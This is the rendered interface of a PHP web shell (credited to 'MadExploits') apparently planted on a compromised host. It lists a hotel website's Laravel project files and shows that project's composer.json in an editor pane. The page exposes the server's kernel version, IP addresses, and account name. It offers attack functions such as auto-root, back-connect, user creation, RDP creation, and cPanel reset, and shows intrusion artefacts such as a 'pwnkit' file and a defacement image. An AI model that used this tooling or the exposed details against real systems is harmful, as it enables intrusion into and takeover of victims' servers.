Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
asiatechinc /
public_html /
bhrhotelsindia.com /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-x---
bootstrap
[ DIR ]
drwxr-x---
config
[ DIR ]
drwxr-x---
custom
[ DIR ]
drwxr-x---
database
[ DIR ]
drwxr-x---
lang
[ DIR ]
drwxr-x---
modules
[ DIR ]
drwxr-x---
plugins
[ DIR ]
drwxr-x---
public
[ DIR ]
drwxr-x---
resources
[ DIR ]
drwxr-x---
routes
[ DIR ]
drwxr-x---
storage
[ DIR ]
drwxr-x---
tests
[ DIR ]
drwxr-x---
themes
[ DIR ]
drwxr-x---
vendor
[ DIR ]
drwxr-x---
.babelrc
60
B
-rwxr-x---
.editorconfig
276
B
-rwxr-x---
.env
678
B
-rwxr-x---
.gitattributes
190
B
-rwxr-x---
.gitignore
559
B
-rwxr-x---
.mad-root
0
B
-rw-r--r--
7znew.php
0
B
-rw-r--r--
app.zip
79.43
MB
-rwxr-x---
artisan
1.78
KB
-rwxr-x---
changelog.md
544
B
-rwxr-x---
composer.json
3.46
KB
-rwxr-x---
composer.lock
479.75
KB
-rwxr-x---
cyberyemen.jpg
54.58
KB
-rwxr-x---
error_log
768
B
-rwxr-x---
google76848c33309484f7.html
53
B
-rwxr-x---
gulpfile.js
1.49
KB
-rwxr-x---
license.html
8.86
KB
-rwxr-x---
package-lock.json
374.7
KB
-rwxr-x---
package.json
1.09
KB
-rwxr-x---
phpunit.xml
1.18
KB
-rwxr-x---
pwnkit
0
B
-rwxr-xr-x
readme.md
971
B
-rwxr-x---
root.html
0
B
-rw-r--r--
server.php
584
B
-rwxr-x---
test.php
1.67
KB
-rwxr-x---
txets.php
1
B
-rwxr-x---
vistaarahotel_app.sql
1.76
MB
-rwxr-x---
vite.config.js
274
B
-rwxr-x---
yarn.lock
260.81
KB
-rwxr-x---
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "type": "project", "description": "The Laravel Framework.", "keywords": [ "framework", "laravel" ], "license": "MIT", "require": { "php": "^8.1.0", "eluceo/ical": "^0.15.1", "flutterwavedev/flutterwave-v3": "^1.0", "fruitcake/laravel-cors": "^2.0", "geoip2/geoip2": "~2.0", "guzzlehttp/guzzle": "^7.2", "intervention/image": "^2.4", "johngrogg/ics-parser": "^2.1", "kalnoy/nestedset": "^6", "laravel/fortify": "^1.10", "laravel/framework": "^9.19", "laravel/sanctum": "^3.0", "laravel/socialite": "^5.0", "laravel/tinker": "^2.7", "laravel/ui": "^3.0", "league/flysystem-aws-s3-v3": "^3.0", "league/omnipay": "^3", "maatwebsite/excel": "^3.1", "mews/purifier": "^3.3", "munafio/chatify": "^1.3.4", "omnipay/migs": "~3.0", "omnipay/paypal": "^3.0", "omnipay/stripe": "^3.0", "payrexx/payrexx": "dev-master", "propaganistas/laravel-phone": "^4.2", "pusher/pusher-php-server": "^7.0", "rachidlaasri/laravel-installer": "^4.0", "rap2hpoutre/laravel-log-viewer": "^2.2.0", "simplesoftwareio/simple-qrcode": "^4.2.0", "spatie/laravel-google-cloud-storage": "^2.0.3", "stripe/stripe-php": "^7.113", "symfony/http-client": "^6.3", "symfony/mailgun-mailer": "^6.0", "symfony/postmark-mailer": "^6.3", "tijsverkoyen/css-to-inline-styles": "^2.2", "ua-parser/uap-php": "^3.9", "unicodeveloper/laravel-paystack": "^1.1" }, "require-dev": { "barryvdh/laravel-debugbar": "^3.7", "fakerphp/faker": "^1.9.1", "laravel/pint": "^1.0", "laravel/sail": "^1.0.1", "mockery/mockery": "^1.4.4", "nunomaduro/collision": "^6.1", "phpunit/phpunit": "^9.5.10", "spatie/laravel-ignition": "^1.0" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/", "Plugins\\": "plugins/", "Custom\\": "custom/", "Modules\\": "modules/", "Themes\\": "themes/" }, "files": [ "app/Helpers/AppHelper.php", "app/Helpers/ProHelper.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ] }, "extra": { "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "php-http/discovery": true } }, "minimum-stability": "dev", "prefer-stable": true }
Close